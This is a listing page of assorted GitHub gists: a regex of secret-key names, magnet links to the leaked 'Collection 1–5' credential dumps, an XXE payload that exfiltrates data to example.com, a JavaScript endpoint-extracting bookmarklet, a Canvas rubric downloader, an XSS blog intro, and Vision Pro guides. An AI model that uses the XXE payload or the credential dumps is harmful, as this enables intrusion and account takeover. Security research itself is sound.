dslusser
h4x0r-dz
/ Generic keys
Created
May 5, 2022 09:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Please Note, I am sharing this, hoping this will be used for good public use, such as data analysis, penetration testing etc | |
| # These links are already available all over the internet | |
| # Also Note, Trying to login into someone else's account without their permission is unethical and illegal | |
| # Collection 1 | |
| magnet:?xt=urn:btih:B39C603C7E18DB8262067C5926E7D5EA5D20E12E&dn=Collection%201&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce | |
| # Collection 2-5 & Antipublic | |
| magnet:?xt=urn:btih:D136B1ADDE531F38311FBF43FB96FC26DF1A34CD&dn=Collection%20%232-%235%20%26%20Antipublic&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce |
0xdevalias
/ _deobfuscating-unminifying-obfuscated-web-app-code.md
Last active
July 14, 2025 15:40
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
Rhynorater
/ gist:d0d19f757221a916a22476c3a5c6aba2
Created
July 27, 2023 19:18
Shubs Windows XXE Payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE doc [ | |
| <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> | |
| <!ENTITY % SuperClass '> | |
| <!ENTITY % file SYSTEM "http://example.com:9200/_cat/indices"> | |
| <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://test/#%file;'>"> | |
| %eval; | |
| %error; | |
| <!ENTITY test "test"' | |
| > | |
| %local_dtd; |
mhmdiaa
/ js_endpoints_new_tab.js
Created
August 6, 2023 20:22
All credit goes to @renniepak for the original bookmarklet https://twitter.com/renniepak/status/1602620834463588352
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javascript: (function() { | |
| var scripts = document.getElementsByTagName("script"), | |
| regex = /(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g; | |
| const results = new Set; | |
| for (var i = 0; i < scripts.length; i++) { | |
| var t = scripts[i].src; | |
| "" != t && fetch(t).then(function(t) { | |
| return t.text() | |
| }).then(function(t) { | |
| var e = t.matchAll(regex); |
colinrubbert
/ getAllGlobals.js
Created
August 23, 2023 14:44
Get all runtime global variables set by the app
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * RuntimeGlobalsChecker | |
| * | |
| * You can use this utility to quickly check what variables have been added (or | |
| * leaked) to the global window object at runtime (by JavaScript code). | |
| * By running this code, the globals checker itself is attached as a singleton | |
| * to the window object as "__runtimeGlobalsChecker__". | |
| * You can check the runtime globals programmatically at any time by invoking | |
| * "window.__runtimeGlobalsChecker__.getRuntimeGlobals()". | |
| * |
dslusser
/ download_canvas_rubric.js
Last active
September 14, 2023 21:31
— forked from acbart/download_canvas_rubric.js
Snippet to download Canvas rubric data for current assignment as a CSV file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async function(){ | |
| // More info on usage - dws: | |
| // https://community.canvaslms.com/t5/Canvas-Developers-Group/Rubric-Analysis-Using-the-API/ba-p/270213 | |
| // Basically just copy/paste this script to the Developer Tools -> Console tab on any Canvas Assignment page | |
| // that has a rubic as a grading method. | |
| // Original Github Gist: https://gist.github.com/acbart/0bfd1b2dbc324b345c305e362e00273c | |
| // https://stackoverflow.com/questions/8735792/how-to-parse-link-header-from-github-api |
Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.
Lab: https://4t64ubva.xssy.uk/
A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:
KhaosT
/ Cloud Gaming on Apple Vision Pro.md
Last active
June 6, 2025 23:04
Guide for clouding gaming on Apple Vision Pro
Cloud Gaming is a great way to enjoy graphically demanding games on Apple Vision Pro.
Since Safari on visionOS does not support PWA mode, here is how you can access cloud gaming services on Apple Vision Pro.
KhaosT
/ HDMI on Apple Vision Pro.md
Last active
July 16, 2025 06:43
Guide for using Apple Vision Pro as HDMI display
While it's possible to stream most content to Apple Vision Pro directly over the internet, having the ability to use Apple Vision Pro as an HDMI display can still be useful.
Since Apple Vision Pro does not support connecting to an HDMI input directly or using an HDMI capture card, we have to be a little creative to make this work. NDI provides the ability to stream HDMI content over a local network with really low latency, and it works great with Apple Vision Pro.
This page shows the setup I’m using.
